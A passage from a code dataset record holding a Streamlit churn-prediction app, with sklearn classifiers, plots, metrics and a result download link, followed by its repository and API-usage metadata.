"line_number": 149, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Spinner", "line_number": 149, "usage_type": "call"}, {"api_name": "dash_html_components.Br", "line_number": 150, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 150, "usage_type": "call"}, {"api_name": "dash_html_components.Br", "line_number": 153, "usage_type": 
"call"}, {"api_name": "dash_core_components.Store", "line_number": 154, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 154, "usage_type": "call"}, {"api_name": "dash_html_components.Br", "line_number": 157, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Col", "line_number": 161, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Card", "line_number": 161, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.CardBody", "line_number": 161, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 162, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Spinner", "line_number": 162, "usage_type": "call"}, {"api_name": "dash_html_components.Br", "line_number": 162, "usage_type": "call"}, {"api_name": "dash_html_components.Br", "line_number": 168, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 185, "usage_type": "call"}, {"api_name": "plotly.graph_objects.Figure", "line_number": 219, "usage_type": "call"}, {"api_name": "plotly.graph_objects", "line_number": 219, "usage_type": "name"}, {"api_name": "plotly.graph_objects.Bar", "line_number": 220, "usage_type": "call"}, {"api_name": "plotly.graph_objects", "line_number": 220, "usage_type": "name"}]}
+{"seq_id": "9268974671", "text": "import plotly.graph_objects as go\nfrom sklearn.metrics import roc_auc_score\nfrom sklearn.metrics import accuracy_score, f1_score, precision_score, recall_score\nfrom sklearn.svm import SVC\nfrom sklearn.linear_model import SGDClassifier\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.model_selection import cross_validate\nimport base64\nfrom pathlib import Path\nfrom sklearn.preprocessing import LabelEncoder, OneHotEncoder\nimport plotly.figure_factory as ff\nfrom sklearn.impute import SimpleImputer\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.model_selection import learning_curve\nfrom sklearn.metrics import confusion_matrix, classification_report\nimport pickle\nfrom sklearn.model_selection import train_test_split\nimport time\nimport streamlit as st\nimport numpy as np\nimport pandas as pd\nimport plotly.express as px\nimport os\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport matplotlib\nmatplotlib.use('Agg')\n\n# --------------------------------------------\n\n\n@st.cache\ndef load_data(uploaded):\n return pd.read_csv(uploaded)\n\n\ndef download_link(object_to_download, download_filename, download_link_text):\n \"\"\"\n Generates a link to download the given object_to_download.\n\n object_to_download (str, pd.DataFrame): The object to be downloaded.\n download_filename (str): filename and extension of file. e.g. mydata.csv, some_txt_output.txt\n download_link_text (str): Text to display for download link.\n\n Examples:\n download_link(YOUR_DF, 'YOUR_DF.csv', 'Click here to download data!')\n download_link(YOUR_STRING, 'YOUR_STRING.txt', 'Click here to download your text!')\n\n \"\"\"\n if isinstance(object_to_download, pd.DataFrame):\n object_to_download = object_to_download.to_csv(index=False)\n\n # some strings <-> bytes conversions necessary here\n b64 = base64.b64encode(object_to_download.encode()).decode()\n\n return f'{download_link_text} '\n\n\ndef customized_plot(type_of_plot, columns, data, target, bins=0):\n\n if type_of_plot == \"Scatter\":\n if len(columns) > 1 and len(columns) <= 2:\n fig = px.scatter(\n data, x=columns[0], y=columns[1], width=620, height=420, title=\"Evolution of \"+columns[0]+\" according to \" + columns[1])\n\n fig.update_layout(title_x=0.5, font_size=15)\n st.plotly_chart(fig)\n else:\n st.sidebar.error('Choose until 2 columns')\n\n if type_of_plot == \"Bar\":\n if len(columns) > 1 and len(columns) <= 2:\n fig = px.bar(data_frame=data, x=columns[0], y=columns[1],\n width=620, height=420, barmode=\"relative\")\n st.plotly_chart(fig)\n else:\n st.sidebar.error('Choose until 2 columns')\n\n if type_of_plot == \"Countplot\":\n fig, ax = plt.subplots()\n fig = plt.figure(figsize=(16, 9))\n ax = sns.countplot(x=columns, data=data, hue=target)\n st.pyplot(fig)\n\n fig2, ax2 = plt.subplots()\n ax2 = sns.heatmap(pd.crosstab(\n data[target], data[columns], normalize='columns'), annot=True)\n st.pyplot(fig2)\n\n if type_of_plot == \"Boxplot\":\n if len(columns) > 1:\n fig = px.box(data_frame=data, x=columns[0], y=columns[1])\n else:\n fig = px.box(data_frame=data, y=columns,\n width=620, height=420, orientation=\"v\")\n\n st.plotly_chart(fig)\n\n if type_of_plot == \"Histogram\":\n fig = px.histogram(data_frame=data, x=columns,\n nbins=int(bins), width=620, height=420, title=\"Distribution of \"+columns)\n 
fig.update_layout(title_x=0.5, font_size=15)\n st.plotly_chart(fig)\n\n if type_of_plot == \"Distribution\":\n if target not in columns:\n st.subheader(\"distribution curve\")\n for col in columns:\n if str(data[col].dtypes) == 'object':\n st.text(\n \"Can't display the distribution plot of a categorical variable\")\n else:\n fig, ax = plt.subplots()\n fig = plt.figure(figsize=(12, 8))\n ax = plt.axvline(x=data[col].quantile(\n q=0.25), c='C1', linestyle=':')\n ax = plt.axvline(x=data[col].quantile(\n q=0.75), c='C1', linestyle=':')\n ax = plt.axvline(x=data[col].mean(), c='C1')\n ax = plt.axvline(\n x=data[col].median(), c='C1', linestyle='--')\n\n ax = plt.hist(data[col], bins=100,\n histtype='step', density=True)\n ax = data[col].plot.density(bw_method=0.5)\n\n plt.legend()\n st.pyplot(fig)\n else:\n st.subheader(\"distribution curve between target and variable\")\n for col in columns:\n if str(data[col].dtypes) == 'object':\n st.text(\n \"Can't display the distribution plot of a categorical variable\")\n else:\n fig, ax = plt.subplots()\n fig = plt.figure(figsize=(16, 9))\n ax = sns.distplot(\n data[data[target] == 1][col], label=\"Exited\")\n ax = sns.distplot(\n data[data[target] == 0][col], label=\"Stayed\")\n plt.legend()\n st.pyplot(fig)\n\n\ndef target_info(data, target):\n st.text('Value Counts By Target/Class')\n st.write(data[target].value_counts(normalize=True))\n st.write(data.iloc[:, -1].value_counts().plot.pie())\n\n fig = go.Figure(\n data=[go.Pie(labels=['Stayed', 'Exited'], values=data[target].value_counts())])\n\n fig.update_layout(title='Statistic of '+target, title_x=0.5, font_size=20)\n st.plotly_chart(fig)\n\n return data[target].value_counts(normalize=True)\n\n\ndef core(data, features, target, model, cv, length):\n\n data = data.dropna()\n features = data.columns.to_list()\n trainset, testset = train_test_split(\n data, train_size=length, random_state=0)\n X_train, y_train = preprocessing(trainset, target)\n \"Train size\", y_train.value_counts()\n X_test, y_test = preprocessing(testset, target)\n \"Test size\", y_test.value_counts()\n\n evaluation(model, X_train, y_train, X_test, y_test, cv)\n\n predictions = model.predict(X_test)\n predictions_p = model.predict_proba(X_test)\n accuracy = accuracy_score(y_test, predictions)\n f_score = f1_score(y_test, predictions, average=\"macro\")\n p = precision_score(y_test, predictions, average=\"macro\")\n r = recall_score(y_test, predictions, average=\"macro\")\n ras = roc_auc_score(y_test, predictions_p[:, 1])\n accuracy_cv = 0\n if cv > 0:\n scores = cross_validate(model, data[features], data[target], cv=cv)\n accuracy_cv = np.mean(scores[\"test_score\"])\n return predictions, predictions_p, accuracy, f_score, p, r, ras, accuracy_cv, y_test, testset\n\n\ndef view(data, target, length, predictions, predictions_p, y_test):\n data_t = pd.DataFrame({\"actual\": y_test,\n \"predictions\": predictions,\n \"predictions_proba\": predictions_p[:, 1]})\n st.write(data_t)\n st.markdown(\"\"\"\n The column \"predictions_proba\" allows to determine the probability of success of the predicted value compared to 1. 
\n \"\"\",\n unsafe_allow_html=True)\n\n labels = ['actual_1', 'predictions_1', 'actual_0', 'predictions_0']\n values = [len(data_t.loc[data_t[\"actual\"] == 1, \"actual\"]), len(data_t.loc[data_t[\"predictions\"] == 1, \"predictions\"]),\n len(data_t.loc[data_t[\"actual\"] == 0, \"actual\"]), len(data_t.loc[data_t[\"predictions\"] == 0, \"predictions\"])]\n\n fig = px.bar(x=labels, y=values, width=620, height=420,\n title=\"Actual and Predicted values of 0 and 1\")\n fig.update_xaxes(title_text='values')\n fig.update_yaxes(title_text='number of values present')\n st.plotly_chart(fig)\n return data_t\n\n\ndef main_content():\n st.markdown(\"\"\"\n Churn Prediction App \n \"\"\", unsafe_allow_html=True)\n\n st.markdown(\"\"\"\n Hello :smiley:. You can see the project here--> Link and the notebook here \n \"\"\",\n unsafe_allow_html=True)\n\n st.sidebar.markdown(\"\"\"\n Navigation \n \"\"\",\n unsafe_allow_html=True)\n\n # separateur = st.sidebar.selectbox(\"Choose a separator\", [',', ';'])\n uploaded = st.sidebar.file_uploader(\"upload\", type='csv')\n\n if uploaded:\n data = load_data(uploaded)\n st.sidebar.write(data.shape)\n if data.shape[0] > 5000:\n reducer = st.sidebar.slider(\n \"Randomly reduce data size %\", min_value=0.2, max_value=0.9, value=0.5)\n reduction = data.shape[0]*reducer\n data = data.sample(int(reduction))\n st.sidebar.write(data.shape)\n st.sidebar.markdown(\"\"\"\n Frame \n \"\"\",\n unsafe_allow_html=True)\n\n if st.sidebar.button('Display Dataframe'):\n \"Raw Data\", data.head(10)\n\n if st.sidebar.button('Some Statistics'):\n st.write(data.describe())\n\n target = st.sidebar.selectbox(\n 'Choose the Target Variable : ', data.columns)\n if len(data[target].unique()) > 2:\n st.sidebar.warning(\"This variable have too much unique value\")\n good_target = False\n elif data.dtypes[target] == 'object':\n st.sidebar.write(data[target].unique())\n st.sidebar.write(\n \"This target Variable don't have numeric variable. 
Let's change it:\")\n input1 = st.sidebar.text_input(\n f\"Change {data[target].unique()[0]} into : \")\n input2 = st.sidebar.text_input(\n f\"Change {data[target].unique()[1]} into : \")\n if st.sidebar.button(\"submit\"):\n data[target] = data[target].map(\n {data[target].unique()[0]: int(input1), data[target].unique()[1]: int(input2)})\n st.write(data)\n target_balance = target_info(data, target)\n good_target = True\n\n try:\n data[target] = data[target].map(\n {data[target].unique()[0]: int(input1), data[target].unique()[1]: int(input2)})\n except:\n st.write(\"error !!!!\")\n\n else:\n st.sidebar.info(\"We are good to go :smiley:\")\n target_balance = target_info(data, target)\n good_target = True\n\n st.sidebar.markdown(\"\"\"\n Visualizing \n \"\"\",\n unsafe_allow_html=True)\n type_of_plot = st.sidebar.selectbox(\"Select a type of plot\", [\n \"Distribution\", \"Bar\", \"Histogram\", \"Boxplot\", \"Scatter\", \"Countplot\"])\n if type_of_plot == \"Histogram\":\n bins = st.sidebar.number_input(\"Enter bins number : \")\n selected_columns_names = st.sidebar.selectbox(\n \"Select a colomn\", data.columns.tolist())\n\n elif type_of_plot == 'Countplot':\n selected_columns_names = st.sidebar.selectbox(\n \"Select one column :\", data.select_dtypes('object').columns)\n\n else:\n selected_columns_names = st.sidebar.multiselect(\n \"Select columns\", data.columns.tolist())\n\n if st.sidebar.button('Generate Plot'):\n st.success(\n f\"Generating {type_of_plot} for {selected_columns_names}\")\n customized_plot(type_of_plot, selected_columns_names,\n data, target, bins=0)\n\n st.sidebar.markdown(\"\"\"\n Preprocessing \n \"\"\",\n unsafe_allow_html=True)\n\n # if st.sidebar.checkbox(\"Check null values\"):\n # st.write(data.isna().sum())\n # null_vals = [i for i in data.isna().sum()]\n # if np.sum(null_vals) != 0:\n # st.write(\n # f\"There is {np.sum(null_vals)} null values\")\n # choice = st.sidebar.selectbox(\"How do you want to remove NaN values?\", [\n # 'Choose an option', 'Dropna', 'Replace by Mean', 'Drop Columns with NaN'])\n # missing_val_count_by_column = (data.isnull().sum())\n # col_with_NaN = missing_val_count_by_column[missing_val_count_by_column > 0].index.to_list(\n # )\n\n # data = deal_with_NaN(data, choice, col_with_NaN)\n # else:\n # st.write(\"Hum !! You are Lucky :smiley:\")\n\n features = st.sidebar.multiselect(\n \"Features\", data.drop(target, axis=1).columns)\n\n if features:\n data = data[features + [target]]\n\n cat_variable = data.select_dtypes(\n 'object').columns.to_list()\n\n if len(cat_variable) != 0:\n for cat in cat_variable:\n if len(data[cat].unique()) > 50:\n st.sidebar.warning(\n \"Too much unique values in \"+cat+\". 
OneHotEncoding may take a long time !!\")\n cat_encoder = False\n st.sidebar.write(f\"{cat_variable} are categorical data\")\n choice = st.sidebar.selectbox(f\"Would you like to create dummies for them ?\", [\n 'Choose an options', 'OneHotEncoding', 'LabelEncoding'])\n\n if choice == 'OneHotEncoding':\n try:\n data = pd.get_dummies(\n data=data, columns=cat_variable, drop_first=True)\n st.write(data)\n cat_encoder = True\n except:\n st.sidebar.write('Choose only one option')\n elif choice == 'LabelEncoding':\n try:\n encoder = LabelEncoder()\n for col in cat_variable:\n data[col] = encoder.fit_transform(data[col])\n cat_encoder = True\n st.write(data)\n except:\n st.sidebar.write('Choose only one option')\n else:\n st.sidebar.warning(\"You have to choose an option\")\n else:\n cat_encoder = True\n\n st.sidebar.markdown(\"\"\"\n Modeling \n \"\"\",\n unsafe_allow_html=True)\n length = st.sidebar.slider(\n \"Train size\", min_value=0.1, max_value=0.9, value=0.8)\n\n cv = st.sidebar.selectbox(\n \"Cross Validation on the train\",\n [0, 5, 10, 15, 20])\n\n model = st.sidebar.selectbox(\n \"Which model do you like!\",\n [\"Decision Tree\",\n \"Random Forest\",\n \"KnnClassifier\",\n \"Logistic Regression\",\n # \"SgdClassifier\",\n \"SVClassification\",\n ])\n if model == \"Decision Tree\":\n params = [\"criterion\", \"max_depth\", \"max_features\",\n \"min_samples_leaf\", \"min_samples_split\"]\n check_param = [st.sidebar.checkbox(\n param, key=param) for param in params]\n criterion, max_depth, max_features, min_samples_leaf, min_samples_split = \"gini\", None, None, 1, 2\n for p in range(len(params)):\n if check_param[p] and params[p] == \"criterion\":\n criterion = st.sidebar.selectbox(\n \"enter criterion value\",\n [\"gini\", \"entropy\"]\n )\n if check_param[p] and params[p] == \"max_depth\":\n max_depth = st.sidebar.selectbox(\n \"enter max_depth value\",\n [None, 2, 5, 10, 15]\n )\n if check_param[p] and params[p] == \"max_features\":\n max_features = st.sidebar.selectbox(\n \"enter max_features value\",\n [None, \"auto\", \"sqrt\", \"log2\"]\n )\n if check_param[p] and params[p] == \"min_samples_leaf\":\n min_samples_leaf = st.sidebar.selectbox(\n \"enter min_samples_leaf value\",\n [1, 5, 8, 12]\n )\n if check_param[p] and params[p] == \"min_samples_split\":\n min_samples_split = st.sidebar.selectbox(\n \"enter min_samples_split value\",\n [2, 3, 5, 8]\n )\n if st.sidebar.button(\"Predicting\"):\n dt = DecisionTreeClassifier(random_state=0, criterion=criterion, max_depth=max_depth,\n max_features=max_features, min_samples_leaf=min_samples_leaf, min_samples_split=min_samples_split)\n if not features:\n st.write(\"You have to choose some features for training\")\n elif good_target == False:\n st.write(\"Choose an appropriete target variable\")\n elif cat_encoder == False:\n st.error(\"You have to encode some variable\")\n else:\n predictions, predictions_p, accuracy, f_score, p, r, ras, accuracy_cv, y_test, X_test = core(\n data, features, target, dt, cv, length)\n data_t = view(data, target, length,\n predictions, predictions_p, y_test)\n tab = pd.DataFrame({\"accuracy\": [accuracy], \"f1_score\": [f_score],\n \"precision_score\": [p], \"recall_score\": [p],\n \"roc_auc_score\": [ras], \"accuracy_cross_validation\": [accuracy_cv]})\n tab.index = [\"\"] * len(tab)\n st.markdown(\"\"\"\n Differents metrics \n \"\"\",\n unsafe_allow_html=True)\n st.table(tab)\n\n st.markdown(\"\"\"\n Calcul of your retention and churn rate \n \"\"\",\n unsafe_allow_html=True)\n retention = (\n 
len(data_t.loc[data_t[\"predictions\"] == 0, \"predictions\"])/len(data_t))*100\n churn = (\n len(data_t.loc[data_t[\"predictions\"] == 1, \"predictions\"])/len(data_t))*100\n st.write(\"Retention rate: \"+str(retention)+\"%\")\n st.write(\"Churn rate: \"+str(churn)+\"%\")\n\n # st.sidebar.markdown(download_link(\n # data_t, \"result.csv\", \"Download predicting results\"), unsafe_allow_html=True)\n\n st.sidebar.markdown(download_link(\n pd.concat([X_test.drop(columns=target), data_t[\"predictions\"]], axis=1), \"result.csv\", \"Download predicting results\"), unsafe_allow_html=True)\n\n if model == \"Random Forest\":\n params = [\"n_estimators\", \"criterion\", \"max_depth\",\n \"max_features\", \"min_samples_leaf\", \"min_samples_split\"]\n check_param = [st.sidebar.checkbox(\n param, key=param) for param in params]\n n_estimators, criterion, max_depth, max_features, min_samples_leaf, min_samples_split = 100, \"gini\", None, None, 1, 2\n for p in range(len(params)):\n if check_param[p] and params[p] == \"n_estimators\":\n n_estimators = st.sidebar.selectbox(\n \"enter n_estimators value\",\n [100, 4, 6, 9]\n )\n if check_param[p] and params[p] == \"criterion\":\n criterion = st.sidebar.selectbox(\n \"enter criterion value\",\n [\"gini\", \"entropy\"]\n )\n if check_param[p] and params[p] == \"max_depth\":\n max_depth = st.sidebar.selectbox(\n \"enter max_depth value\",\n [None, 2, 5, 10, 15]\n )\n if check_param[p] and params[p] == \"max_features\":\n max_features = st.sidebar.selectbox(\n \"enter max_features value\",\n [None, \"auto\", \"sqrt\", \"log2\"]\n )\n if check_param[p] and params[p] == \"min_samples_leaf\":\n min_samples_leaf = st.sidebar.selectbox(\n \"enter min_samples_leaf value\",\n [1, 5, 8, 12]\n )\n if check_param[p] and params[p] == \"min_samples_split\":\n min_samples_split = st.sidebar.selectbox(\n \"enter min_samples_split value\",\n [2, 3, 5, 8]\n )\n if st.sidebar.button(\"Predicting\"):\n rf = RandomForestClassifier(random_state=0, n_estimators=n_estimators, criterion=criterion, max_depth=max_depth,\n max_features=max_features, min_samples_leaf=min_samples_leaf, min_samples_split=min_samples_split)\n if not features:\n st.write(\"You have to choose some features for training\")\n elif good_target == False:\n st.write(\"Choose an appropriete target variable\")\n elif cat_encoder == False:\n st.error(\"You have to encode some variable\")\n else:\n predictions, predictions_p, accuracy, f_score, p, r, ras, accuracy_cv, y_test, X_test = core(\n data, features, target, rf, cv, length)\n data_t = view(data, target, length,\n predictions, predictions_p, y_test)\n tab = pd.DataFrame({\"accuracy\": [accuracy], \"f1_score\": [f_score],\n \"precision_score\": [p], \"recall_score\": [p],\n \"roc_auc_score\": [ras], \"accuracy_cross_validation\": [accuracy_cv]})\n tab.index = [\"\"] * len(tab)\n st.markdown(\"\"\"\n Differents metrics \n \"\"\",\n unsafe_allow_html=True)\n\n st.table(tab)\n\n st.markdown(\"\"\"\n Calcul of your retention and churn rate \n \"\"\",\n unsafe_allow_html=True)\n retention = (\n len(data_t.loc[data_t[\"predictions\"] == 0, \"predictions\"])/len(data_t))*100\n churn = (\n len(data_t.loc[data_t[\"predictions\"] == 1, \"predictions\"])/len(data_t))*100\n st.write(\"Retention rate: \"+str(retention)+\"%\")\n st.write(\"Churn rate: \"+str(churn)+\"%\")\n\n # st.sidebar.markdown(download_link(\n # data_t, \"result.csv\", \"Download predicting results\"), unsafe_allow_html=True)\n\n st.sidebar.markdown(download_link(\n 
pd.concat([X_test.drop(columns=target), data_t[\"predictions\"]], axis=1), \"result.csv\", \"Download predicting results\"), unsafe_allow_html=True)\n\n if model == \"KnnClassifier\":\n params = [\"n_neighbors\", \"weights\", \"algorithm\"]\n check_param = [st.sidebar.checkbox(\n param, key=param) for param in params]\n n_neighbors, weights, algorithm = 5, \"uniform\", \"auto\"\n for p in range(len(params)):\n if check_param[p] and params[p] == \"n_neighbors\":\n n_neighbors = st.sidebar.selectbox(\n \"enter n_neighbors value\",\n [5, 10, 15, 20, 25]\n )\n if check_param[p] and params[p] == \"weights\":\n weights = st.sidebar.selectbox(\n \"enter weights value\",\n [\"uniform\", \"distance\"]\n )\n if check_param[p] and params[p] == \"algorithm\":\n algorithm = st.sidebar.selectbox(\n \"enter algorithm value\",\n [\"auto\", \"ball_tree\", \"kd_tree\", \"brute\"]\n )\n if st.sidebar.button(\"Predicting\"):\n knn = KNeighborsClassifier(\n n_neighbors=n_neighbors, weights=weights, algorithm=algorithm)\n if not features:\n st.write(\"You have to choose some features for training\")\n elif good_target == False:\n st.write(\"Choose an appropriete target variable\")\n elif cat_encoder == False:\n st.error(\"You have to encode some variable\")\n else:\n predictions, predictions_p, accuracy, f_score, p, r, ras, accuracy_cv, y_test, X_test = core(\n data, features, target, knn, cv, length)\n data_t = view(data, target, length,\n predictions, predictions_p, y_test)\n tab = pd.DataFrame({\"accuracy\": [accuracy], \"f1_score\": [f_score],\n \"precision_score\": [p], \"recall_score\": [p],\n \"roc_auc_score\": [ras], \"accuracy_cross_validation\": [accuracy_cv]})\n tab.index = [\"\"] * len(tab)\n st.markdown(\"\"\"\n Differents metrics \n \"\"\",\n unsafe_allow_html=True)\n\n st.table(tab)\n\n st.markdown(\"\"\"\n Calcul of your retention and churn rate \n \"\"\",\n unsafe_allow_html=True)\n retention = (\n len(data_t.loc[data_t[\"predictions\"] == 0, \"predictions\"])/len(data_t))*100\n churn = (\n len(data_t.loc[data_t[\"predictions\"] == 1, \"predictions\"])/len(data_t))*100\n st.write(\"Retention rate: \"+str(retention)+\"%\")\n st.write(\"Churn rate: \"+str(churn)+\"%\")\n\n # st.sidebar.markdown(download_link(\n # data_t, \"result.csv\", \"Download predicting results\"), unsafe_allow_html=True)\n\n st.sidebar.markdown(download_link(\n pd.concat([X_test.drop(columns=target), data_t[\"predictions\"]], axis=1), \"result.csv\", \"Download predicting results\"), unsafe_allow_html=True)\n\n if model == \"Logistic Regression\":\n params = [\"penalty\", \"solver\"]\n check_param = [st.sidebar.checkbox(\n param, key=param) for param in params]\n penalty, solver = \"l2\", \"lbfgs\"\n for p in range(len(params)):\n if check_param[p] and params[p] == \"penalty\":\n penalty = st.sidebar.selectbox(\n \"enter penalty value\",\n [\"l2\", \"l1\", \"elasticnet\", \"none\"]\n )\n if check_param[p] and params[p] == \"solver\":\n solver = st.sidebar.selectbox(\n \"enter solver value\",\n [\"lbfgs\", \"newton-cg\", \"liblinear\", \"sag\", \"saga\"]\n )\n try:\n if penalty == \"l1\" and solver in ['newton-cg', 'sag', 'lbfgs']:\n st.error(\"L1 don't work with \" + solver +\n \". But, it work well with 'liblinear' and 'saga' \")\n if penalty == 'elasticnet' and solver != 'saga':\n st.error(\"elasticnet don't work with \" +\n solver + \". 
But it work well with saga.\")\n else:\n\n if st.sidebar.button(\"Predicting\"):\n lr = LogisticRegression(\n random_state=0, penalty=penalty, solver=solver)\n if not features:\n st.write(\n \"You have to choose some features for training\")\n elif good_target == False:\n st.write(\"Choose an appropriete target variable\")\n elif cat_encoder == False:\n st.error(\"You have to encode some variable\")\n else:\n predictions, predictions_p, accuracy, f_score, p, r, ras, accuracy_cv, y_test, X_test = core(\n data, features, target, lr, cv, length)\n data_t = view(data, target, length,\n predictions, predictions_p, y_test)\n tab = pd.DataFrame({\"accuracy\": [accuracy], \"f1_score\": [f_score],\n \"precision_score\": [p], \"recall_score\": [p],\n \"roc_auc_score\": [ras], \"accuracy_cross_validation\": [accuracy_cv]})\n tab.index = [\"\"] * len(tab)\n st.markdown(\"\"\"\n Differents metrics \n \"\"\",\n unsafe_allow_html=True)\n\n st.table(tab)\n\n st.markdown(\"\"\"\n Calcul of your retention and churn rate \n \"\"\",\n unsafe_allow_html=True)\n retention = (\n len(data_t.loc[data_t[\"predictions\"] == 0, \"predictions\"])/len(data_t))*100\n churn = (\n len(data_t.loc[data_t[\"predictions\"] == 1, \"predictions\"])/len(data_t))*100\n st.write(\"Retention rate: \"+str(retention)+\"%\")\n st.write(\"Churn rate: \"+str(churn)+\"%\")\n # st.sidebar.markdown(download_link(\n # data_t, \"result.csv\", \"Download predicting results\"), unsafe_allow_html=True)\n\n st.sidebar.markdown(download_link(pd.concat([X_test.drop(\n columns=target), data_t[\"predictions\"]], axis=1), \"result.csv\", \"Download predicting results\"), unsafe_allow_html=True)\n\n except:\n st.warning(\"Choose another solver or another penalty\")\n\n if model == \"SVClassification\":\n params = [\"kernel\", \"degree\"]\n check_param = [st.sidebar.checkbox(\n param, key=param) for param in params]\n kernel, degree = \"rbf\", 3\n for p in range(len(params)):\n if check_param[p] and params[p] == \"kernel\":\n kernel = st.sidebar.selectbox(\n \"enter kernel value\",\n [\"rbf\", \"poly\", \"sigmoid\", \"precomputed\"]\n )\n if check_param[p] and params[p] == \"degree\":\n degree = st.sidebar.selectbox(\n \"enter degree value\",\n [3, 6, 9]\n )\n if st.sidebar.button(\"Predicting\"):\n sv = SVC(random_state=0, kernel=kernel,\n degree=degree, probability=True)\n if not features:\n st.write(\"You have to choose some features for training\")\n elif good_target == False:\n st.write(\"Choose an appropriete target variable\")\n elif cat_encoder == False:\n st.error(\"You have to encode some variable\")\n else:\n predictions, predictions_p, accuracy, f_score, p, r, ras, accuracy_cv, y_test, X_test = core(\n data, features, target, sv, cv, length)\n data_t = view(data, target, length,\n predictions, predictions_p, y_test)\n tab = pd.DataFrame({\"accuracy\": [accuracy], \"f1_score\": [f_score],\n \"precision_score\": [p], \"recall_score\": [p],\n \"roc_auc_score\": [ras], \"accuracy_cross_validation\": [accuracy_cv]})\n tab.index = [\"\"] * len(tab)\n st.markdown(\"\"\"\n Differents metrics \n \"\"\",\n unsafe_allow_html=True)\n\n st.table(tab)\n\n st.markdown(\"\"\"\n Calcul of your retention and churn rate \n \"\"\",\n unsafe_allow_html=True)\n retention = (\n len(data_t.loc[data_t[\"predictions\"] == 0, \"predictions\"])/len(data_t))*100\n churn = (\n len(data_t.loc[data_t[\"predictions\"] == 1, \"predictions\"])/len(data_t))*100\n st.write(\"Retention rate: \"+str(retention)+\"%\")\n st.write(\"Churn rate: \"+str(churn)+\"%\")\n\n 
st.sidebar.markdown(download_link(\n                    pd.concat([X_test.drop(columns=target), data_t[\"predictions\"]], axis=1), \"result.csv\", \"Download predicting results\"), unsafe_allow_html=True)\n\n\ndef deal_with_NaN(data, choice, col_with_NaN):\n    if choice == \"Dropna\":\n        data = data.dropna(axis=0)\n        st.write(data.isna().sum())\n        return data\n\n    if choice == \"Replace by Mean\":\n        imputer = SimpleImputer(strategy='mean')\n        Imputed_data = pd.DataFrame(imputer.fit_transform(data))\n        # restore the original column names after imputation\n        Imputed_data.columns = data.columns\n        return Imputed_data\n\n    if choice == \"Drop Columns with NaN\":\n        return data.drop(columns=col_with_NaN)\n\n\ndef preprocessing(data, target):\n    X = data.drop(target, axis=1)\n    y = data[target]\n\n    return X, y\n\n\ndef evaluation(model, X_train, y_train, X_test, y_test, cv):\n    model.fit(X_train, y_train)\n    ypred = model.predict(X_test)\n    st.write(\"Confusion Matrix\")\n    st.write(confusion_matrix(y_test, ypred))\n\n    N, train_scores, test_scores = learning_curve(model, X_train, y_train, train_sizes=np.linspace(0.1, 1, 10),\n                                                  cv=10)\n\n    fig = plt.subplots()\n    fig = plt.figure(figsize=(12, 8))\n    ax = plt.plot(N, train_scores.mean(axis=1), label='train score')\n    ax = plt.plot(N, test_scores.mean(axis=1), label='test score')\n    ax = plt.title(\n        \"Learning curve for accuracy: this shows us whether the model overfits\")\n    plt.legend()\n    st.pyplot(fig)\n\n    return model\n\n\ndef main():\n    \"\"\"Common Machine Learning EDA\"\"\"\n\n    main_content()\n\n\nif __name__ == '__main__':\n    main()\n", "repo_name": "badou11/streamlit_for_churn", "sub_path": "churnapp.py", "file_name": "churnapp.py", "file_ext": "py", "file_size_in_byte": 36529, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "matplotlib.use", "line_number": 30, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 37, "usage_type": "call"}, {"api_name": "streamlit.cache", "line_number": 35, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 53, "usage_type": "attribute"}, {"api_name": "base64.b64encode", "line_number": 57, "usage_type": "call"}, {"api_name": "plotly.express.scatter", "line_number": 66, "usage_type": "call"}, {"api_name": "plotly.express", "line_number": 66, "usage_type": "name"}, {"api_name": "streamlit.plotly_chart", "line_number": 70, "usage_type": "call"}, {"api_name": "streamlit.sidebar.error", "line_number": 72, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 72, "usage_type": "attribute"}, {"api_name": "plotly.express.bar", "line_number": 76, "usage_type": "call"}, {"api_name": "plotly.express", "line_number": 76, "usage_type": "name"}, {"api_name": "streamlit.plotly_chart", "line_number": 78, "usage_type": "call"}, {"api_name": "streamlit.sidebar.error", "line_number": 80, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 80, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 83, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 83, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 84, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 84, "usage_type": "name"}, {"api_name": "seaborn.countplot", "line_number": 85, "usage_type": "call"}, {"api_name": "streamlit.pyplot", "line_number": 86, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 88, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 88, 
